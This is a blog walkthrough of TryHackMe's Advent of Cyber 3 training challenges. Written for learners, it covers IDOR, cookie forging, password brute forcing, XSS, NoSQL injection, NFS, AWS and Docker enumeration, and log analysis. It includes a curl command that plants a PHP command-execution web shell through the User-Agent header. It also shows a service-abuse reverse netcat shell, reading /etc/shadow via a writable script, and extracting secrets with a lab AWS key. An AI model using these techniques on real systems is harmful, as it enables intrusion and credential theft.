TryHackMe ‘Advent of Cyber 3’ Walkthrough

Alright. This is going to be quite a lengthy post as events get added, but I thought I’d accumulate all of my personal walkthrough for TryHackMe’s Advent of Cyber 3 event here. This is a pretty basic intro to some infosec topics and a surface level look at their applications. I know there are official video walkthroughs for each task (and many other walkthroughs, I’m sure), but this is my take on them in the least complicated way possible (I hope). I will be amending this post as more challenges are added, so stay tuned.


Day 1    Day 6     Day 11    Day 16    Day 21
Day 2    Day 7     Day 12    Day 17
Day 3    Day 8     Day 13    Day 18
Day 4    Day 9     Day 14    Day 19
Day 5    Day 10   Day 15    Day 20

Day 1

On day 1, we’re taking a look at IDOR vulnerabilities. This one is very simple to get your feet wet.

When you naviagate the site and its pages, you’ll notice that the Your Activity page has a parameter value in the URL that we can manipulate. Play around with this until you find “Santa”.


Once you find “Santa”, you can answer the first question.


Keep manipulating the parameter value, until you find “McStocker” and you will have your answer to question 2.


Continue manipulating the value until you find your culprit and his position in the company and you have your answer to question 3.


Revert all of the changes made by the Grinch and you will receive your flag to answer question 4. We’re done! Piece of cake.

Day 2

On day 2, we explore manipulating cookies for malicious use. This one is also fairly simple. Let’s hop in.

Open the provided website and register an account.


Notice that you will get some kind of error message with your registration, but if you toggle Developer Tools in Firefox, and navigate over to the Storage tab and look under Cookies, you will see a cookie name and value for the account you tried registering. Here you have your answer to the first question.


If you look at the cookie value, you’ll see the format has numbers and letters from 0-9 and a-f, respectively. This is characteristic of hexadecimal format. This is your answer to question 2.

Question 3 threw a lot of people off. If you use CyberChef to decode the value of your cookie “from hex”, you will get the output below. If you know what JSON looks like this is characteristic of a basic JSON object:

{ "first" : "John" , "middle" : "K", "last" : "Doe" }

This is the answer to your 3rd question.


Now, if you take this output and copy it to the input field and change the value of username to “admin”, you can convert this “to hex” and change your delimiter from “Space” to “None”, you will have the answer to your next question.


Take this value over to your browser and in Developer Tools, edit the cookie value for user-auth.


Once you refresh this page, you will be logged in as admin and here you have the answer to your next 2 questions.


Well done! Day 2 complete.

Day 3

In day 3, we are taking a look at some simple directory bruteforcing and authentication bypass. This one is also fairly simple, so let’s just dive right in.

Spin up the machine and either using THM’s AttackBox or a VPN connection, we will run dirb to discover the directory for the admin panel. Here you will find the answer to your first question.


Once you find this directory, navigate over to it in your browser and attempt to log in as “administrator” with one of the default passwords. Once you figure out which one, you will have your answer to question 2.

And once you complete the login, you will have the answer to your last question and completed day 3’s challenge. Great job!

Day 4

Day 4 is where things start to get a little more complex, especially if you’ve never used burp suite before. We will be using this to run a simple password list attack on the login password.

Launch the machine and navigate to the website. We see it’s a login form. We know from the question that the user is “santa”. Launch burp suite and head over to the “Proxy” tab and make sure “Intercept is on” and log in with a dummy password and capture the request.


If you continue to foward the request, you will see “Invalid username and password”. Note this for later.


Right click anywhere on this request and select “Send to Intruder”. Head over to the “Intruder” tab. And under the “Payloads” tab, make sure that “Simple list” is selected as “Payload type” and Load the passwords.txt file that you downloaded. This list should populate in the box.


Now head over to the “Options” tab and scroll down to “Grep – Match”. Clear the previous list and in the bottom add the error message that we previously saw: “Invalid username and password”. This value will populate in the box.


Head over to the “Positions” tab in Intruder and clear out the selected positions.


With your mouse, highlight only the password value and click add to add your attack position on the password value.


Now here’s the fun part. Click “Start attack”.


You will notice that every password attempt that matches our “Invalid username and password”, will get a status of 200. The one that does not is your correct password. This is your answer to the first question.

Once you log in using these credentials, you will find your flag and answer to your last question. That’s it! Day 4 done.

Day 5

In day 5, we will take a look at a simple XSS vulnerability.

Log into the site with the credentials provided. And under “Settings”, reset McSkidy’s password to “pass123”.


Select one of the threads and add a comment checking to see if it is processed. We will start with simple HTML.


As you can see, our HTML is processed and “world” is underlined. That means our comment field is vulnerable.

Use the payload provided to leave as a comment. This XSS payload will change any user’s password to “pass123”. You can include text to make it less suspicious, but I left it blank. Either way it will still reflect the XSS.


Once you’re done, login as grinch with pass123 and in “Settings” disable the Buttmas plugin to reveal your flag.

With this, you are done with day 5. Congrats!

Day 6

Day 6 picks back up and gets a little more involved. Here we will examine a local file inclusion vulnerability to extract some info.

Launch the machine and head over to the URL. You will see an error message because we are not logged in. If you take a look at the URL, though, we will find a parameter and value we can manipulate. This is the answer to your first question.


Change the value to read the first flag and answer question 2.

Use the PHP filter technique provided to retrieve the value of $flag from index.php. This will be displayed in base64, so copy the entire hash and head to this Base64 Decoder to decode it. Once you decode, you will see your flag and answer to question 3.


From that same decoded text. you will see your next target: ./includes/creds.php


Using the same PHP filter, extract the username and password hash.


Once again, head over to your base64 decoder and decode it. Here you will get your answer to question 4. Format is username:password

Using those credentails, log into the site and retrieve the flag for the server password under “Password Recovery”. This should be your answer to question 5.


The next task is a little more involved and I saw a lot of people complicating this one. Access the logs over at ./includes/logs/app_access.log. You will see the output displayed below.


Using your attacker machine and curl, issue the following command:

curl -s -H “User-Agent: <?php system(\$_GET[‘cmd’]); ?>” “”


If you reload the page with the access log, you will see the warning below. It says it cannot execute a blank command, which is good, because now we know that we can issue an actual command.


Append &cmd=hostname to your previous URL and if you look at the output, you will see the value of your executed command. And your answer to the last question.


And there you have it, we have completed Day 6. Awesome!

Day 7

On day 7, we’re taking a look at NoSQL databases. This was an interesting one because not a lot of people have the chance to interact with NoSQL databases and it also combined some elements from a previous day. Let’s dive right in.

First thing we do is ssh to our mongodb server using the provided credentials. Once on the server we can run the command mongo to interact with the database and issue the follow commands to extract our first flag and answer to our first question.


The next challenge asks us to use burp suite to intercept and modify the login request to bypass the login. So, open the url in your browser and attempt to log in as admin with a dummy password.

Meanwhile over in burp suite, under the “Proxy” tab, make sure you have your intercept turned to capture the login request. Once captured, we can modify the password parameter by inserting [$ne] or “not equals” (as show below) to invalidate the password.


Once you forward the request in burp and check your browser, you should be logged in as admin and have access to your 2nd flag and answer to the next question.


While logged in as admin, we will perform a search for “admin” while capturing the request over on burp.


Once we have this request captured, we can modify the GET method by inserting [$ne] (as shown below) for username and changing the role to “guest”.


We can now forward this request and take a look over at our browser, where we will see all of the guest accounts listed, including our next flag and answer to the next question.


Our last challenge here will once again use burp to capture and modify our request. This time we will perform a search for “mcskidy”.


Looking over at burp, we have captured this request and modified the request by inserting our “not equals” [$ne] for the role “user” (as shown below).


Once this request is forwarded and we take a look over on our browser, we can see mcskidy’s account details and the answer to our last question.


And with that, we are done with day 7. Yay!

Day 8

Day 8, we’re taking a look at some log analysis and a bit of open source intelligence (OSINT). This day was a bit long-winded but pretty straightforward if you followed along. So, let’s get into it.

If you load up the machine, you should have an RDP session to a Windows box. We’ll start by taking a look at SantasLaptopLogs on the Desktop.


If you take a look at the first powershell log file, you will quickly find the answer to your first question.


The systeminfo command that was run quickly gives you the answer.


The answer to our next question can be found in the 3rd log file.


If you take a look, you can see the net user command used to add the backdoor account “s4nta”.


Examining the last log file on this list, you will find the answer to our 3rd question.


Here you can see that the backdoor account “s4nta” copies a file over.


In this same log file, you can see the LOLbin binary that our backdoor account used to encode the UsrClass.dat file and your answer to the next question.


Once again using CyberChef as we did on day 2’s challenge, we copy the encoded block at the end of this same log file and decode it “from base64” and then download the decoded .dat file onto our machine to examine it with Shellbags Explorer (also available on the Desktop).

Under File -> Load offline hive, select our decoded .dat file and open it.


If you expand the directories in the left pane, you will quickly find the answer to the 5th question. The question hints at “publicly accessible software hosted”.


The next question asks us to find the file under the “Bag of Toys” folder. Expand this folder and you will see your file.


The next couple of tasks involve a little OSINT action as we head over to Github to pick up a few things. If we look up the SantaRat software on Github, we will see who wrote it and get our answer to question 6.


If we check out Grinchiest’s other software respositories, we will see the other repository that seems interesting to our investigation and the answer to our next question.


Moving right along, we head back to our log files to find the name of the executable that our malicious user used to steal Santa’s bag of toys.


The 2nd log file on the list reveals our malicious .exe and the answer to the next question.


Now we take a look at our last log file (4th one in the folder) to find the contents of the malicious file placed by our backdoor account.


As you can see, the value “GRINCHMAS” was echoed into the malicious files (coal, mold, etc.) that replaced Santa’s actual content. This is the answer to our next question.


Back over on Github, looks like our malicious user left a trail in the commits for the “operation-bag-of-toys” repository. Open this commit and it will reveal the password and the answer to the next question.


Once you have this password handy, hop over to the Desktop of your Windows machine and open up the password protected archive using the password.


With this, you have recovered the original contents of Santa’s bag of toys and can answer your final question.


Yay! You have helped save Christmas and completed day 8’s challenge. Well done!

Day 9

Day 9’s challenge is also fairly simple. In this challenge, we take a look at some basic packet analysis using the venerable tool Wireshark. Let’s go for it.

Once you download the .pcap file provided by the challenge, you can proceed to open it with Wireshark.

Our first question asks to find the directory of our first GET request. We can apply the filter http.request.method==GET and this will immediately reveal your answer.


Next we will use the filter http.request.method==POST to take a look at the POST login request that will reveal our username and password to answer the next question. This is under HTML Form URL Encoded. Answer format is username:password.


Using this same request, we can look under Hypertext Transfer Protocol to reveal our flag and answer to the next question.


If you use the filter dns.txt, we can reveal our TXT query response. Right-cliking and following the UDP stream will reveal your next flag and answer . I shall leave this one to you.


Using the ftp.request filter, we can quickly uncover the FTP password in plaintext. As you can see the response below, it says “Login Successful”. This is the answer to our next question.


Using the same filter, we can see the FTP command used to upload our secret.txt file and answer our next question.


For our last question, we will use the ftp-data filter and under Line-based text data, we will reveal the content of our secret.txt file in plaintext. This answers your last question.


And with that, we are done with day 9. That wasn’t too bad, was it? Wireshark packet analysis can be pretty tedious when looking through very large .pcap files, but filters make it a whole lot easier. Wireshark’s documentation has tons of filters. Check them out here.

Day 10

Day 10 was a super easy challenge and walks us through some basics of nmap scanning. Nmap is an amazing and versatile tool to have in your arsenal. Let’s take a look.


First task asks us to run a simple TCP scan with nmap -sT. This scan will answer your first 3 questions.


We are then asked to run a SYN scan with nmap -sS. As you can see the results are the same and you can answer your next question.


Next we are asked to run a version scan with nmap -sV to figure out the version of the web server running to answer our next question.

We are then told to navigate to thiswebsite and look up which CVE was fixed with version 2.4.51 of Apache web server. Easy peasy.


Next we perform an all TCP ports scan to pick up a port that was previously not detected because, without specifying, nmap only scans the first 1000 common ports.

Pro tip: If you don’t like waiting forever for an nmap all ports scan, check out this command: nmap -T5 --open -sV --min-rate=1000 --max-retries=2 -p- [ip address]

See how much faster this runs? Cool, huh?


This answers your last 2 questions and ends day 10’s challenge. Super!


Day 11

On day 11, we take a look at a bit of nmap and MS SQL. This one was also fairly straightforward, so let’s dive in.

To answer our first question, we run a quick nmap scan to find the port running MS SQL using nmap -Pn -sV. That was pretty easy. Let’s move on.


Next we use the sqsh command with the username and password provided to connect to the MS SQL instance and interact with the database to answer our next question.

To answer our next question, we will use the SQL query SELECT * FROM reindeer.dbo.names; to extract the contents of the names table in the reindeer database.

The next question has us extract the contents of the table schedule. We can use the same query from the previous example and adjust our values with SELECT * FROM reindeer.dbo.schedule;

We will do the same for the presents table to answer the next question using the query SELECT * FROM reindeer.dbo.presents;

For our last question, we will extract the contents for the flag.txt file from user grinch‘s directory using the MS SQL command xp_cmdshell. If you know Window’s directory structure, this should be fairly simple, though you may have to do a little digging for the folder where it’s stored. We use type to read the file located at: C:\Users\Grinch\Documents\

And with that, we are done with day 11. Awesome!


Day 12

On day 12, we’re taking a look at Network File System (NFS) shares and mounts (with a bit of nmap peppered in). Let’s roll.

We start with running a quick nmap scan using nmap -Pn -sV [ip addr]. This should take care of your first 2 questions.


Next we run showmount -e [ip addr] and view the shares available. This will answer the next 2 questions.


We are then asked to create the directory tmp1 using mkdir tmp1 and mount [ip addr]:/my-notes tmp1 to mount the share to tmp1. As you can see below, we get an error here. That means we can’t mount and view this share publicly.


I switched to the AttackBox for the rest of these as we were getting some errors via VPN, so that’s why these screenshots look slightly different.

If we mount the share share using mount [ip addr]:/share tmp1 and take a look at the contents, we can see 2 text files.


If we open 2680-0.txt using nano (or any editor of choice), we can see the title and answer to our next question.


We are then asked to find the share where the malicious user left his id_rsa ssh key behind. We can safely assume where this would be and can answer the next question. We can mount the share using mount [ip addr]:/confidential tmp1 and view its contents.


Last we are tasked with finding the MD5 sum of id_rsa. We can do this simply using md5sum and answer our last question.

And with this, we are done with day 12. Great!


Day 13

On day 13, we’re getting into some Windows cmd (or PowerShell) commands to gather some info, as well as some simple reverse shell exploitation using a running service with privileges. Let’s check it out.

First we are asked to find the user starting with the letter “p”. For this, we will use net users. Simple.


Next, we are asked to find the version of the operating system running. We can do this using systeminfo | findstr /B /C:”OS Name” /C:”OS Version”. The command provided by the challenge isn’t typed out correctly, so if you copy it directly, you will get an error. This will save you a bit of headache. This answers your next question.


3rd question asks to find the backup service that is running (we know it’s Iperius from the text above). We can look this up by running wmic service list.


Next question can also be answered from this same output.


This is where things get a bit more fun and interesting. We’re going to exploit the running backup service to get a reverse netcat shell on our attacker machine.

Open the Iperius Backup program from the programs list and select Create new backup.


Under the Items tab, add a folder to backup. This can be any folder. We used the same one provided in the example.


Add C:\Users|McSkidy\Documents and click OK.


Under the Destinations tab, add a destination folder. Again, we used the one from the example.


Add C:\Users\McSkidy\Desktop and click OK.


Open up Notepad from the programs list and copy the simple .bat script provided and save this file. I named it shell.bat and saved it on the Desktop. Name and location does not matter. Remember to change the IP address to the IP of your attacker machine.


On your attacker machine, open up a netcat listener using nc -nlvp 1337 to catch our shell.


Back in Iperius, under the Other processes tab, select Run a program or open external file and choose the shell.bat that we previously created and click OK.


Now on the home page, right-click on your created backup job and select Run backup as service.


If you wait a minute or so, you should get a shell on your attacker machine.


Now you can run your last last few commands to answer the last 3 questions. First we will run whoami.


Next we will find the flag.txt in the Grinch’s Documents folder.


And we find the answer to the last question by viewing the Schedule.txt file in the same folder.


And voila! We are done with day 13. That one was pretty cool, huh?


Day 14

On day 14, we’re taking a look at exploiting insecure permissions to extract information. This one was pretty quick and straightforward.

We start by using dirb to enumerate the site’s directories using dirb’s default settings with dirb With this, we can answer our first question.


Over on the AttackBox, we cd to thegrinch’s scripts directory and reveal the answer to our next question.

You will notice that the script has write permissions for our user mcskidy, meaning we can edit this file.


We edit this file to read the contents of the /etc/shadow file.


If you give it a minute or so and navigate over to /admin directory discovered earlier, you will see the script output reflected. This should answer your 3rd question.


Edit the script again to read the contents of the flag.txt file on thegrinch’s Desktop.


Once again, give it a minute or so and head over and reload the webpage from before. This will give you the answer to your last question.


And with that, we are done with day 14. We are more than halfway there!


Day 15

So, day 15 wasn’t a challenge at all, but an infosec “aptitude quiz” of sorts. Based on your answers, an infosec career path is determined along with some suggested TryHackMe learning paths to complete. My results are below.

Nothing else for day 15. See you all tomorrow!

Day 16

Day 16 was short and sweet as we take a look at some basic OSINT techniques.

The challenge starts us off with a ransomware message written in Russian. It’s pretty obvious what the answer to our first question is, but we can translate this message to read its contents, if needed.

Doing a quick search for this username, we quickly find the Twitter account belonging to our user. This answers our next question.

Clicking on this Twitter profile, we can see that the pinned tweet has the info for our next 2 questions. I’ll leave the specifics up to you.

If we navigate over to our user’s profile, we can see his bitcoin address and the answer to our next question. We can also see that this user has a Github account tied to this profile. This also answers our next question.

The next question involves something that we got a taste of on our day 8 challenge. If we do some digging in the user’s Github account, we find a commit in the ChristBASHTree repository.

Taking a look at this commit, we can see that the user deletes a previously added entry of his email address. With this we can answer the last 2 questions.

And that’s it for day 16. Great job.

Day 17

Day 17’s challenge was pretty cool and useful, especially if you don’t have much interaction with Amazon Web Services (AWS). Let’s hop right in.

We are given an image and tasked to find the name of the S3 Bucket used to host it. This is fairly straightfoward from the info provided in the challenge.

We can right-click the image and go to its actual image location. With this, we can answer our first question.

Next, we are asked to find the contents of the flag.txt file stored in this bucket. We can just use curl to dump its contents. Pretty simple.

We can use aws s3 ls s3:// --no-sign-request to list the other files in the bucket. We can immediately spot one that catches our eye.

We can download the locally using curl --output

Make sure to include --output otherwise curl will just output everything on your screen and that does us no good.

Unzip the archive and we can see a wp_backup folder is extracted.

If we navigate to this directory, we can see that this appears to be a standard WordPress site and therefore any interesting credentials will be in wp-config.php

We are looking for the AWS Access Key ID in this file, so we can simply cat wp-config.php | grep AKIA to get this directly.

Alternatively, we can use an editor and search through the file.

We can use the info above to create a profile test (you can name this whatever you want) with the command provided in the challenge aws configure --profile test

In order to extract the AWS Account ID, we can use aws sts get-access-key-info --access-key-id AKIAQI52OJVCPZXFYAOI --profile test

Be sure to include the profile that you created above.

We are then asked to find the username for the access-key. We can do this once again using our profile with aws sts get-caller-identity –profile test

In order to locate the EC2 instance in this account, we can use aws ec2 describe-instances --output text --profile test | grep TAGS

Once again, don’t forget your profile and using grep just makes this a bit easier to read.

The last thing we need to do is extract the database password stored in the Secrets Manager in this instance.

We can do this by first listing the secret IDs in the Secrets Manager using aws secretsmanager list-services --profile test

We can see a command reference list for secretsmanager here.

Using aws secretsmanager get-secret-value --secret-id HR-Password --profile test we get the output below.

This tells us that the string we are looking for is not available in this region i.e. us-east-1, the region we set for our profile. It tells us to look closer to where Santa “lives”.

We can use something like this to check for other available regions. Basically we need something closer to the North Pole.

We can modify our command to use aws secretsmanager get-secret-value --secret-id HR-Password --region eu-north-1 --profile test

And with that, we can the answer to our last question.

Day 17 complete. Well done.

Day 18

Day 18 brings us another relevant challenge. Here we take a look at some container technology, specifically Docker images.

Using the provided AttackBox, we can take a look at the available containers with docker images

This answers our first question.

We can pull down a specific container to investigate locally using docker pull

We can run and interact with the container with docker run -it

With an interactive shell inside the container, we can issue standard *nix commands, such as ls -la

To answer our last 2 questions, we create a directory with mkdir aoc and navigate over to it.

We then use docker save -o aoc.tar to download it as a tar archive and extract it using tar -xf aoc.tar

Using cat manifest.json | jq we can see the .json config file used to build the container image, as well as a collection of image layers.

Once you locate the layer of particular interest to us, we can navigate to its directory and extract the layer.tar.

From here, we can use cat root/envconsul/config.hcl | grep ‘token’ to find our token and answer our last question.

And with this, we have completed day 18.

Day 19

Day 19, we’re taking a lot at some email phishing. This one was quick and fun, so let’s get to it.

Using the provided AttackBox, we open the email program.

Once we do, we are greeted with an email. This email will help us answer our first few questions.

We can see who the recipient of the email is below.

We can also see who the sender is.

We can see that the reply to email is different than the sender’s email. This is pretty common practice with phishing attempts.

Also common among phishing attempts are misspellings. If we look at the body of the email, we can spot the spelling error.

If we hover over the reset password button, we can see the URL that we are being directed to on the bottom left corner of our email application. This is good practice before randomly clicking in suspicious emails.

We are then asked to view the source of the email.

Looking through the email source, we can immediately spot the suspicious looking email header.

We are then asked to look at similar emails sent by colleagues. For this, we can take a look at the Email Artifacts folder on the Desktop.

If we open the attachment.txt file, we can see the name of the attached PDF in the emails.

The answer to our last question is a bit more involved, but pretty straightforward. In order to find the flag, we will use the attachment-base64-only.txt file located in that same folder.

We can open up a terminal and use cat attachment-base64-only.txt | base64 -d > file.pdf to decode the base64 block and output it to PDF.

If we look back in our folder, we can see the file.pdf

We can now simply open the PDF to retrieve our flag.

And with that, we have completed day 19. Great.

Day 20

Day 20 was short and sweet as we’re introduced to properly handling and analyzing suspicious files.

On our AttackBox, we are asked to examine the testfile on the Desktop using the strings command and recording its output. Simple enough.

Next, using the command file, we can see its file type.

In order to further investigate this file, we calculate its MD5 hash using md5sum.

Taking this hash over to VirusTotal, we can run a search.

If we head over to the Details tab, we can spot the “First Seen In The Wild” date.

Under the Detection tab, we can see Microsoft’s classification for this file.

We are then asked to navigate over to this link and answer our last 2 questions.

Here we find what the file used to be named.

And the maximum characters allowed in the file.

And with that, we are done with Day 20. Almost at the finish line.

Day 21

On day 21, we’re looking at some basic YARA rules for detecting patterns in malicious files. This was another quick one, so let’s hop right in.

First, we create a new document named eicaryara on the desktop of our AttackBox with the provided rule in the example (shown below).

We can run the following examples against the testfile (also found on the desktop) using our eicaryara rule file.

You can answer the first question if you are familiar with operators. ‘and’ matches on all rules, while ‘or’ would match on any.

Our second question asks which option is used to extract the metadata that are a hit to a file. We know this is -m from the example provided.

Our third questions asks in which section of our rule can we find the ‘author’ information. We know this is the ‘metadata’ section.

We can take a look at the -h (help) menu for yara to answer our next question. -n is the option that we need to print rules that did not hit.

Our last question has us change the ‘O’ (letter) to a ‘0’ (zero) in our yara rule file and save.

If we run yara with the -c option (count), we can see the result and answer to our last question.

That’s it for day 21. See you all soon.